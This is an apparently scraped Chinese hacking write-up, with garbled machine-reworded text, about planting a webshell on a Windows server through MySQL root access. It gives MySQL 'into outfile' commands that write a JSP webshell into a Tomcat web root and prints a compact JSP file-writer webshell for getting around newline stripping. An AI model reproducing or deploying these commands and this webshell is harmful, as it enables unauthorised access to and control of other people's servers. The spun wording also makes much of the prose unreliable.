|
|
|
联系客服020-83701501

解决Win下MySQL root导出Webshell换行符问题

联系在线客服,可以获得免费在线咨询服务。 QQ咨询 我要预约
管理Win下MySQL root导出Webshell换行符问题

旧日碰到了这么个问题,简单记录一下我的管理筹算。
起首说一下处事器的状况。处事器的80端口按照尺度的虚构主机来配置的,反对asp,aspx,php,可是不反对php
放置了mssql(1433端口),tomcat(8080端口),serv-u(43958端口)和两个mysql(3306端口和3307端口)
提权的时辰没有sa暗码,没有serv-u暗码,mysql 5.1起首运行了

Default
1 show variables like '%plugin%';

后,依照设置导出dll到C:\Program Files\MySQL\MySQL Server 5.1\lib\溃烂
成立自定义函数似乎被拦挡,不绝腐败。
后找到tomcat目录,准备写马,asp,aspx,php对tomcat目录:C:/Program Files/cngradms_x86/tomcat/网站apps/ROOT/均无写入权限
测试mysql有写入权限。故上传jsp大马至网站网站目录:d:\xxx\fuck.jsp
用mysql实行语句:

Default
12 select load_file('d:\\xxx\\fuck.jsp')  into outfile 'C:\\Program Files\\cngradms_x86\\tomcat\\网站apps\\ROOT\\upload\\fuck.jsp'复制代码

后溃烂。
可是访问后获得如下提示:

1.png

清楚明了是MySQL的Win下版本积极减少原义符\n\r了
何等导致法度模范运行的悲剧。
从网上找了得多设施,什么update把原义符消掉,enclose巴拉巴拉,横竖八门五花便是没一个大要用的。
开头弄了这么个小脚本: Default
12345678910 <%@ page language="java" pageEncoding="gbk"%><jsp:directive.page import="java.io.File"/><jsp:directive.page import="java.io.OutputStream"/><jsp:directive.page import="java.io.FileOutputStream"/><% int i=0;String method=request.getParameter("act");if(method!=null&&method.equals("yoco")){String url=request.getParameter("url");String text=request.getParameter("smart");File f=new File(url);if(f.exists()){f.delete();}try{OutputStream o=new FileOutputStream(f);o.write(text.getBytes());o.close();}catch(Exception e){i++;%>error<%}}if(i==0){%>ok<%}%><form action='?act=yoco' method='post'><input size="100" value="<%=application.getRealPath("/") %>" name="url"><br><textarea rows="20" cols="80" name="smart">

便大要提防原义符让JSP的马儿运行500谬误了。

link:http://bbs.blackbap.org/thread-3623-1-1.html

作者:YoCo Smart 【Silic Group Hacker Army】 本文由网络平安攻防研究室(www.91ri.org)动静平安小组征集整理,转载请注明来由。

数安新闻+更多

证书相关+更多